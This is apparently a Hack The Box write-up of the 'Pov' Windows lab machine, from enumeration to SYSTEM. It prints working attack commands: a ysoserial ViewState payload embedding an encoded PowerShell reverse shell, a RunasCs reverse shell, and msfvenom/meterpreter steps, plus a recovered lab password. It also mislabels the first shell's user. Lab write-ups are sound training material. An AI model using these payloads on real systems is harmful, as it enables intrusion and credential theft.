HTB - Pov

IP Address: 10.10.11.251

Machine Info

Pov is a medium Windows machine that starts with a webpage featuring a business site. Enumerating the initial webpage, an attacker is able to find the subdomain dev.pov.htb. Navigating to the newly discovered subdomain, a download option is vulnerable to remote file read, giving an attacker the means to get valuable information from the web.config file. The subdomain uses the ViewState mechanism, which, in combination with the secrets leaked from the web.config file, is vulnerable to insecure deserialization, leading to remote code execution as the user sfitz. Looking at the remote filesystem, an attacker can discover and manipulate a file that reveals the credentials for the user alaading. Once the attacker has code execution as the user alaading the SeDebugPrivilege is abused to gain code execution in the context of a privileged application, ultimately resulting in code execution as nt authority\system.

Enumeration

Nmap Scan

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -F $ip -Pn         

PORT   STATE SERVICE
80/tcp open  http

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -p- --min-rate 2500  $ip -Pn

PORT   STATE SERVICE
80/tcp open  http

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ nmap -sC -sV -p80 $ip

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0

Fuzz for subdomains

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://pov.htb/ -H 'Host: FUZZ.pov.htb'  

dev        [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 131ms]

Add to /etc/hosts

┌──(kali㉿kali)-[~/…/machines/Windows/Medium/Pov]
└─$ sudo sh -c "echo '10.10.11.251 pov.htb dev.pov.htb' >> /etc/hosts"

LFI

web.config

From the secrets from web.config file, I can create .NET serialized object and attempt to get RCE

Shell as pov\sfitz

Creating serialized object with ysoerial

.\ysoserial.exe -p ViewState -g WindowsIdentity --path="/portfolio" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" -validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --validationalg="SHA1" -c "powershell -c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMgAxACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

rQkpxoUR3biNzp3mTLbIkpX1ROXuVDredVARBpljCQ7S2YdpUGClf67G8NN%2FRnU8uksJYAl3lw5oPGmxJ6MCPRjOs58yA3RgtaCZ5q16sVjLv9qbHP%2FDm1ONIo5ElkOt5GpqVPmnmqIvBZtMEk8mMlVCkucZgpdnkDTO428lWjsVJxfvEZgOX0Tj2BK8uvPpCPvlyjAS02gCiXpBQgkFfUF3UXgpxK2L9OVQ%2BK88H5zHd1fHXc4HC8ritovqr%2B%2F%2F1cpGGc4ThrdP%2BpEA95zs2%2BBvy0lBdnR6h3N7w6Gb7p%2FDcX%2BZtzC7C0hMJbX41iNu%2FCmqAYROEu%2Bs1hVH%2BVmmk1SbRgqTHV8JmrDWRbP7OCfqiYJynyEIOAGAMXcfkbf5luNmXzvIchTv6TXaL84uQ6rEcbRCHtmanA5OMpnpG%2Bhf77NyMOIKRIhLRLV8Aucp4irZ0FjXi9AZv9jmbmJZ9prZ%2F7x0aSROdwlUVLuJWl4O7J5INEer0m%2FJuCQNx9X1mxer%2FblF8GeKJkNIBiPQhCvHj159AxmRGEyogoQBlSEP5glWyzZf2IyH9CIPyz4aQGHU2JYFtm5VXyH%2F4J15b8vb0m2dEbk0Htmp9BfPAOjAFuPsgfyzIa1PyYeCn5DdV1ZAHPgogqDEtEjg1qKrUkXMx8Ve0XfUBvuvExNuiaWuidnNpl31D44PdkvTdsoUG0nBO6NxP%2BgQF90GjKYKX57JTB%2Bleth446Nee2TDpTHLSf6hRnzqnbLAmaevDu37NjlvCJstCGqesPtSs8yqmGXFSOu%2BJNOnLTYcrr41eGGpqDhMULGF%2FHnBRHGaCY3PJzjhyn9PBb1oaMCuccWiJnmkpaB8TwXrow5VrT0l02LMk1JtBcNJO5NC5sMrA8vthZXmL4cwHFZ6Z20rrAS3JNt3cAEW1qLjyTRJvKh7aHEiIZ25R2P8yvKGxSDHpCIKKhjXGwbkr0qULbH8NqB6Au30RWaqZF6WNrqqBwiD%2By49zy6y0K%2Bs1WLi821Nwp6TVPvs%2Bok9a0rMN4QgaExyA1qAv6JwxEkdBJltVMH8ymbM26sLMCi7Ui2ya6Eq5x5BVVl97AsLiFqUTGdJOgdEMhO%2FNyHO4iuemFuUHTpMMdeIOOt%2F7%2Fjh2yje%2Bqe7x2dhpER63%2FTsiiSyCnTZSdt4T0Iy8o0t%2BkE9d%2B%2BLvrhlTQNRe8wanrnScyDOmXG2rUu5bfLbXS8BTPjF5DwryUUGikcOxoovIckg32OyPwkMRLomJ0yZoIWzkQBIgJ61JZfhJ%2BH0FcARRF%2BbA3G83D0s3Mtmg2QHojtXtSQ8EtBWfJqjyfm0oA5%2FaeNfsKp5EuKXxqiIKmmaOPN1onN2pVxOH5fAtGfa2tZFx0b3FStcsNOeHJ6z2HNOSNXq6Kdn3WgC7COcowAlTNJBwrbp3xp71wl5cKwGcvmacnpqBIoACD9IMSRGViRBhqA138Kv2jO0t7x7a9FC9z0on3NPkI%2Fg3RRiKyWHjXcMQWLetSMQouqSZOm7pXt7%2F90vVc3KfUGXJkYNcgpJD9MCv2VpERQ9Cwu7HHKkdlxefX5gVwadNUj3g1nPa9Xsw2cgezQYySNof5kBCOSCvgPT2kKuAPb%2BZhNxwQRkwqXN4ChhI9WitDdpWKAfPBST%2B8hRrG2D0IVOYhRuVnHBMIjAfh4XI05D8w3f9SghrgrRckvY%2F02jjrZ2UqBBnDiqf8WLLwqXZWAM3oTT7z5Mn3gie8EyLFv6iFd9wGutmE2nCMMw8Pe8eZqgJWyy6vy0KGCk3hVzoFfcf2MlsB5ZP2SzlNAQKfd%2F6fFi8ohFNXYGi0TBXkuczRA7WXr6etUu43MzcQWNDBMSQ882nuslcNC2Ba5fXVWGbGNtgo2m5liiVYH3uv2KH3379e6OsbH6a%2F448A8f9eSQp2cFYezM8y869EMH9bXpQtUZtZ0PrrERBc80sEQI3Op%2BkF%2BfizdfHG0sszoGYkyUWfTKb3%2F0g66Qv4FN%2BON0Nm91Z27%2FHfGmWwjwlAhrxoGAxuK7GFRSa3ZREnqSsY1JpoNpz%2FImUDgI9VyVISRTiZ8AJEkbyCW3unN7xYsmNFMvrbGbxrykNU0i%2BxQHeAx7QsZ9DsmPH4syCg2QjQ%2FCiQk8vQVKNZNvd2r82hFygg5%2BWnE4QmEv483HMiIJIXb1h9sd25Y%2BkI%2Bk3oiMgOGHiyceZG54%2By5H9AOUEFUp81K1GQiNtyN9%2B646lfN4T%2FoGyPuAQgkaokAxy69Gb7Jqi6OvG5iAoKYsf0kvfibmQ7QQ7ZsTxyo%2FlKACfBLnFyHCRnSJxnu3W%2B21W%2BlJ7TE6A1fpEHkD6NM6ATHvUT7lcPl9mZca6HUNgzJ8lIFDDaLl1fEDBCJeTXytbjZ%2BnAB2lsJDww9iHjIv2Ujtsax80RiIXFet5A4uUFii4M6vEkQ8wCE119R%2FoYfvd5QedvOr5LIvrXJlqn5MDkfMvxzeEidK7i2poJeH7p6eIioyhA814mDZyyImrhqFX11lEOWTZLhvrbp%2BaUzgM9n7hkvnDNcYSbibBWH57zKsMqEstEdFSc%2BPs2ancizWrodNMhG34elppw3DK8trdoR6PQPsxf8Fw1QitDBFjdD2UuRGj7gF7VODq5JLnVsK9F%2BqW6tTe2WMPfhxQVJ1Z1Wc%2BfbEfo93ClmWteISv9KwlRe%2FMH%2FX0vS%2BkhzkzkDg%2BYFrXT1V1WlAQOC9eZpdytkeGvnY67IgtI8mNVMhd3mMcVS7iA362AhEC6%2FTzgvyMW8xdNiY%2BkN30FRpngvPGIcyBK%2FOPdpo881EWtTkqaitxxgNuOW5%2BpWFbfReBsVQSKEknlnf414S3nT7Ng8t1kT2U7PzYNdXUli9F81fEh7MXPfuhQBXuh0hk13zy70AV0a0FLT1l%2BlA2BRYfOlDvDm5HE0zWBJOLgII2AgQGRmUmDup3w%2FdULgdH9e8xEXMVne1X9HRLpmeILfauTYai2tXPwOt2N1wlJvRiNg4adbugqpeGm%2FRBvPx5Glg3AcDSJmBFEcF9fr2ZYn%2BzB8CCOSaHe%2FkqImP9FW4z0T%2FshjgStQarppt25pnsqCkwdHr3cpX53nu6SOqg7U%2BANFhdkuVDR4vY%2BhfaOJi44RANAACBpy14aeibWyHqKz%2BzwrS453%2BT1UJw5eMwHtTKl6ETBhLibBR%2BBX0jZWWpaD7VIxFQKIMbdkvuaVludGedKGTaeoSIKBYK5cN%2B7FlfVUI7%2FwHoEUt1cH3u6GtdOwm5wxWFGXMvPNWMDFzzkZAibylrClRjqxJbAqf3ijXuTKxXCQBu6rJxHioZq3pTh1ruLTNzLIKQ%2FScRGKuLaqNd0mSQI6rSnp0mdSBnD%2FgW10bcRKESfOWvFD1yTUSPCI3ujU6T0tP%2BQaOzhcuoZpMjVlbUAJv%2BS43SF42d2CdyvWib4GcKCPH6yRNwsKJrcfFl3DPvmlZcN9TfIJaZ9q2VeQyU2WaRK3YL83hme53lxFi4G2ySbPAu8tzoPgOCWb0n6pnsQFOLQ%2FoQ4KAYEpZH2Tn4%2BejZlj%2BHZrfBZi9a67Cxvvmq61ipj6HGBSfgfMO7VrxfhUlE2f2nR76jwF8BZ1XlvEKNg9H1HKtbgg%2F7KUvDgWfBFXpWdkuWy5QlCjRKlJ3mu%2F%2FEJStdP%2FEL%2BmbJG7u0A38hJxdrKwmvPJvVlbfxGjq2WNC8qvsdV9mODugxnMm2K%2F8IOJM8zkTTRlJR4m3i79Dgci56Ty5umrn744ok8j79FX8llxpIvxAG96Oixtl%2BPx6%2FjpG9D6toA5p9cdy%2BtFm%2F7UH53uH61JAp0Z3W6BWScN9dMohd5VuG7bzublkTYzAQZw7QEvh3TKncKJhahGJige7WoidZQTLmVqzFnY9cx9x0So3FsS5mTcxf%2FxqbeALEZeofjrWaFhEMidOFbYLjfVA26smK0TS1VJz4BKp7LJNn4ca0vJ5pDQnEqqqDFdd1fNkPW1SIcRMlphq%2B%2Fzw3ZUboL0sBZsFXS%2FDBbfQogDLICmqc%2FTyVeNT8y2coocraBASh1hYKeXTJ%2FYvCHxa6GWljDtsyEg3oZ5P1LWWTxf3i4drwsDuD8C8kngaeJdD%2By5lwyKFnFPZh%2BTVwaRbAaJWNF5cQYdIg68MIJVWnxyDgpxWIXRYQJDaIoe1sstBLGJbCfUhOg%2Ft4WYazlX1LxLgvG4mMU2AL7PoRoXPm91NDJaNH52GiiLhTsNbZqbkhwROu4XGkqW07iw5wsRYnGWv%2F5TPEdQ%3D

I inject the object above in _VIEWSTATE parameter and get a shell as alaading

Shell as alaading

PS C:\users\sfitz\documents> ls

    Directory: C:\users\sfitz\documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/25/2023   2:26 PM           1838 connection.xml

It is a PS Credential for alaading:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>
    </Props>
  </Obj>
</Objs>

PowerShell credentials are often used for scripting and automation tasks as a way to store encrypted credentials conveniently.
The credentials are protected using DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.

PS C:\users\sfitz\documents> $credential = Import-Clixml -Path 'C:\users\sfitz\documents\connection.xml'
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().username
PS C:\users\sfitz\documents> $credential.GetNetworkCredential().password

alaading:f8gQ8fynP44ek1m3

PS C:\users\sfitz\documents> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 PowerShell.exe -r 10.10.16.21:443

I'm the Administrator :)

If you have SeDebug privileges, you can debug programs and processes from memory, so we can dump lsass.exe process and get all the secrets and hashes from the machine.
To get RCE as SYSTEM account, you can start meterperter shell and migrate to winlogon process from Metasploit

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9001 -f exe -o shell.exe

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 9001
msf6 exploit(multi/handler) > run

meterpreter > ps winlogon

PID  PPID  Name          Arch  Session  User                 Path
 ---  ----  ----          ----  -------  ----                 ----
 548  468   winlogon.exe  x64   1        NT AUTHORITY\SYSTEM  C:\Windows\System32\winlogon.exe
 
meterpreter > migrate 548
meterpreter > gituid
Server username: NT AUTHORITY\SYSTEM  

meterpreter > shell

PreviousHTB - Queier NextHTB - Certified

Last updated 1 year ago